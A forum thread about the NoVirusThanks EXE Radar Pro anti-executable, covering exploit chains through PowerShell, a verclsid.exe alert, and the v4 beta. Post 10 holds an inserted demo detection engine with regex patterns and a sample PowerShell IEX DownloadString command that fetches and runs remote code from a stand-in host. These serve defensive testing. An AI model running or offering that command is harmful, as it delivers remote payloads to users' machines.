New Antiexecutable: NoVirusThanks EXE Radar Pro

Discussion in 'other anti-malware software' started by sg09, Jun 3, 2011.

  1. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    1,359
    Location:
    Italy
    @Mister X

    That is a different issue.

    We'll add the option "Set Alert Dialog to Always on Top" to fix that.

    @paulderdash

    Simply whitelisting all exes is not good, of course; that is why we introduced "Vulnerable Processes" and now (with ERP v4.0) Parent->Child control.

    The problem is that if you whitelist PowerShell.exe, then a malicious .DOC file can exploit WINWORD.exe to run PowerShell.exe to download and execute a remote payload. Or it can run JavaScript code via Cmd.exe (so there is no need to drop a payload on the disk). PowerShell.exe and Cmd.exe are commonly used by exploits and should not be whitelisted (instead, they should be filtered). Thanks to Vulnerable Processes + filtering of Parent->Child + filtering of the command line, you can block or be alerted about this behavior.
     
  2. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    Superb explanation in brief. Definitely one of the more important (for me anyway) notes of interest to pen in my defense vs attack (or vice-versa) journal.

    Appreciate it much. Other duties demanding my attention lately but a huge expression of gratitude to those needling out the bugs in these preliminary releases to date. All you guys rock! Special thanks developer andreas for the new work.
     
  3. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    4,639
    Location:
    Under a bushel ...
  4. guest

    guest Guest

    It should stop it.
     
  5. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
    I have to disagree with that comment. Not all attacks involve automatic exploits, so white-listing is still a must to protect users against manually installing malware. And a lot of exploits will still eventually run file-based malware, which also should be stopped via white-listing.
     
  6. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    Why would NVT ERP be giving me alerts for verclsid.exe, which is part of Windows XP SP3? Could it be because the file isn't digitally signed?
     
  7. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    Depends on your settings, and on where the file is located.
    If it is in windows folder, and you set ERP to auto-allow system files, then it should not alert, even if unsigned (this is assuming that it did not involve a command line containing a vulnerable process). Otherwise, it should alert.
     
  8. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    @shmu26

    Thanks for the quick reply. When the first alert appeared I clicked on the "Block" button. After rebooting I got the alert again and again clicked on the "Block" button. There have been no alerts since then. It's a fresh (new) install of NVT ERP, and I'm guessing that had a lot to do with it.
     
  9. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    Maybe you disabled the alert for it?
    Check if it is on the blocked list, and where it is located in the file system.
    If you were on ERP default settings, and this file is in the windows folder, you should not have gotten an alert in the first place.
    I know nothing about Windows XP, so maybe someone else can give you more informed input.
     
  10. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    It happened again when I right-clicked on a file in Windows Explorer. I've attached a screenshot of the alert message.

    Here's what was in the alert pop-up:
    Code:
    Unknown Application Detected
    Process Name: verclsid.exe
    Process Path: C:\WINDOWS\system32\
    Command-Line: /S /C {57CE581A-0CB6-4266-9CA0-19364C90A0B3} /I {000214E8-0000-0000-C000-000000000046} /X 0x401
    Parent Process: C:\WINDOWS\Explorer.EXE
    File Publisher: Microsoft Corporation
    File Description: Verify Class ID
    Digital Signature: False

    I checked the MD5 and SHA-1 values for verclsid.exe and confirmed that it is part of Windows. I also checked the blacklist inside NVT ERP, and it is empty.

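    The parent->child, command-line and vulnerable-process rules the developer describes in post 1, and the "auto-allow system files" behaviour shmu26 describes in post 7, as a toy policy engine run over the verclsid.exe alert quoted in this post. This is an added example written for this page, not NoVirusThanks code: the vulnerable-process and Office-parent lists beyond PowerShell.exe, Cmd.exe and WINWORD.exe, the command-line patterns, and the three extra launch events in demo() are assumptions constructed for the demo. Vulnerable-process rules are evaluated first on purpose, so a whitelist entry or a system-folder location never rescues PowerShell.exe or Cmd.exe.

```python
"""Toy re-implementation of the allow/alert/block logic discussed in this
thread (vulnerable processes, parent->child control, command-line filtering,
and the 'auto-allow system files' setting). Added example, not ERP code."""
import ntpath
import re
from dataclasses import dataclass

# Assumed lists: powershell.exe, cmd.exe and WINWORD.exe come from the thread;
# the remaining entries are typical additions, not ERP's shipped lists.
VULNERABLE_PROCESSES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
SUSPICIOUS_CMDLINE = [re.compile(p, re.I) for p in (
    r"downloadstring|downloadfile|invoke-webrequest",  # fetch a remote payload
    r"(^|\s)-(e|enc|encodedcommand)\s",                # encoded PowerShell
    r"javascript:|\bmshta\b",                          # script without a dropped file
)]
WINDOWS_DIR = "c:\\windows\\"

# The alert text quoted in the post above, used here as parser input.
VERCLSID_ALERT = """Unknown Application Detected
Process Name: verclsid.exe
Process Path: C:\\WINDOWS\\system32\\
Command-Line: /S /C {57CE581A-0CB6-4266-9CA0-19364C90A0B3} /I {000214E8-0000-0000-C000-000000000046} /X 0x401
Parent Process: C:\\WINDOWS\\Explorer.EXE
File Publisher: Microsoft Corporation
File Description: Verify Class ID
Digital Signature: False"""


@dataclass
class ProcessEvent:
    name: str      # image file name
    path: str      # directory the image was loaded from
    cmdline: str
    parent: str    # full path of the parent image
    signed: bool   # Authenticode signature present and valid

    @property
    def full_path(self) -> str:
        return ntpath.join(self.path, self.name).lower()

    @property
    def parent_name(self) -> str:
        return ntpath.basename(self.parent).lower()


def parse_alert(text: str) -> ProcessEvent:
    """Turn the 'Key: value' lines of an ERP alert into a ProcessEvent."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return ProcessEvent(
        name=fields["process name"],
        path=fields["process path"],
        cmdline=fields.get("command-line", ""),
        parent=fields["parent process"],
        signed=fields.get("digital signature", "False").lower() == "true",
    )


def decide(ev: ProcessEvent, auto_allow_system_files: bool = True,
           whitelist: frozenset = frozenset()) -> tuple:
    """Return (verdict, reason); verdict is 'allow', 'alert' or 'block'."""
    cmd = ev.cmdline.lower()
    # Vulnerable-process rules first: neither whitelist nor system folder may override them.
    if ev.name.lower() in VULNERABLE_PROCESSES or any(v in cmd for v in VULNERABLE_PROCESSES):
        if ev.parent_name in OFFICE_PARENTS:
            return "block", f"{ev.parent_name} spawned vulnerable process {ev.name}"
        for pat in SUSPICIOUS_CMDLINE:
            if pat.search(ev.cmdline):
                return "block", f"command line matched /{pat.pattern}/"
        return "alert", f"{ev.name} is a vulnerable process: filtered, never auto-allowed"
    if ev.full_path in {w.lower() for w in whitelist}:
        return "allow", "whitelisted by full path"
    if auto_allow_system_files and ev.full_path.startswith(WINDOWS_DIR):
        return "allow", "inside the Windows folder; this setting does not require a signature"
    return "alert", "unknown application" + ("" if ev.signed else " (unsigned)")


def demo() -> list:
    """The real verclsid alert plus three constructed launches; returns (name, verdict, reason)."""
    ps_dir = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0"
    events = [
        parse_alert(VERCLSID_ALERT),
        ProcessEvent("powershell.exe", ps_dir,
                     "-nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')",
                     "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", True),
        ProcessEvent("cmd.exe", "C:\\Windows\\System32", "/c dir", "C:\\Windows\\explorer.exe", True),
        ProcessEvent("powershell.exe", ps_dir, "-EncodedCommand SQBFAFgA", "C:\\Windows\\explorer.exe", True),
    ]
    return [(ev.name, *decide(ev)) for ev in events]


if __name__ == "__main__":
    for name, verdict, reason in demo():
        print(f"{verdict:5}  {name:15}  {reason}")
```

    With the default "auto-allow system files" setting the unsigned verclsid.exe in C:\WINDOWS\system32 is allowed, which is the behaviour shmu26 describes; with that setting off it alerts, which matches the alert shown above. The Word-spawned PowerShell and the encoded-command launch are blocked, while a plain cmd.exe from Explorer is only alerted on, since it is filtered rather than whitelisted.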
     
  11. guest

    guest Guest

    If it is not malicious and part of Windows, you can add the file to the whitelist. Else you'll see the prompt every time.
     
  12. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    By the way, since you are using ERP, it is obvious that you are serious about PC security. So you should seriously consider moving on to a more secure version of Windows. Don't assume that ERP or other security software is enough to make up for the inherent weaknesses of XP. You are still vulnerable because the XP operating system is not built to protect from modern malware. The Windows kernel is not protected well enough.
     
  13. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    237
    Actually, I do have Windows 8.1 Professional (retail), and I also locked in my free upgrade to Windows 10. However, I don't really like either of them. Using Windows 8.1 often makes me feel annoyed and frustrated, and I don't like feeling that way. Basically, the only reason I use it is to run tax software and other specialized software that requires a supported version of Windows.

    Since I dumped Windows 12 years ago in favor of Linux, I really only use Windows when I have no other choice. That being the case, I will only run Windows in a VM. And, unlike Windows 8.1 and Windows 10, Windows XP runs very well in a VM (on my hardware). Yes, you're right, using Windows XP is less than ideal from a security perspective, but I don't think that's reason enough to totally abandon it. A WinXP VM is useful for running old software, and the security situation can be improved considerably by heavily restricting the main "threat gates". Currently, IE and Firefox are forced to run sandboxed, and only Firefox is allowed to access the internet. But I think I will go ahead and lock down IE, Outlook Express, and WMP, etc., so they won't even be able to run if something tries to launch one of them. BTW, I think "surfing" the web on Windows XP nowadays is unwise; the main reason I have a web browser installed is because some software uses a web browser to access help files and other documentation.
     
    Last edited: Dec 8, 2017
  14. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    1,549
    Yeah, I also use XP in a virtual machine, for legacy software.
     
  15. paulescobar

    paulescobar Registered Member

    Joined:
    Sep 22, 2008
    Posts:
    197
    To all,

    I am an Exe Radar Pro user for many years. I just returned to this topic after many months.
    There's over 200 pages to wade through, so I'd rather just ask here.
    I see a new version of the program has been released. Can anyone catch me up?
    1) Where can I download this new version?
    2) Is it beta & buggy? Or relatively stable?
    3) What Windows OS's are supported?
     
  16. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    So far it's more alpha than beta, and the beta currently out is a private beta, so for now there is nothing to test. It is fairly stable, it just isn't complete, and I believe so far it's for all operating systems.
     
  17. hayc59

    hayc59 Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,841
    Location:
    KEEP USA GREAT
    paulescobar Hello :)
    1) Where can I download this new version?
    Download Here: http://www.novirusthanks.org/products/exe-radar-pro/
    2) Is it beta & buggy? Or relatively stable?
    Very Stable BETA
    3) What Windows OS's are supported?
    For Windows XP, Vista, 7, 8, 10 (32/64-bit)
     
  18. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,794
    Location:
    .
    He's looking for the new alpha version...
     
  19. guest

    guest Guest

    This is the old beta (v3.xx); as @Mister X said, he is talking about v4. ;)

    1- Nowhere, until it is made public in January 2018 (first week, if my memory is good).
    2- At the moment it is an alpha version with many features not yet implemented; the core is quite stable, and some bugs/issues were discovered and are currently being addressed.
    3- At least Win 7/8/10, not sure about XP though.

    @novirusthanks can surely give you more details.
     
  20. Tarnak

    Tarnak Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    5,285
    I want to give this a try since I have used it on my XP desktop previously. I will wait until after the kinks have been ironed out in the beta testing of this new version, then will see how it goes on Windows 10 Pro.
     
  21. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
    Good to know, I was getting worried. The current version is already pretty good, but I need more control.
     
  22. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,556
    Is the new ERP 4 compatible with SUA accounts?
     
  23. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,794
    Location:
    .
    Not for the time being. Andreas is working on that.
     
  24. Azure Phoenix

    Azure Phoenix Registered Member

    Joined:
    Nov 22, 2014
    Posts:
    1,556
    Thanks for the reply.
     
  25. guest

    guest Guest

    The next beta release will be delayed a little bit, but I assume it will have a driver co-signed by Microsoft so ERP 4 can be used on a Secure Boot-enabled system.

    (If their application "OS Armor" gets a co-signed driver, other applications from NoVirusThanks will very probably also get one, sooner or later.)
     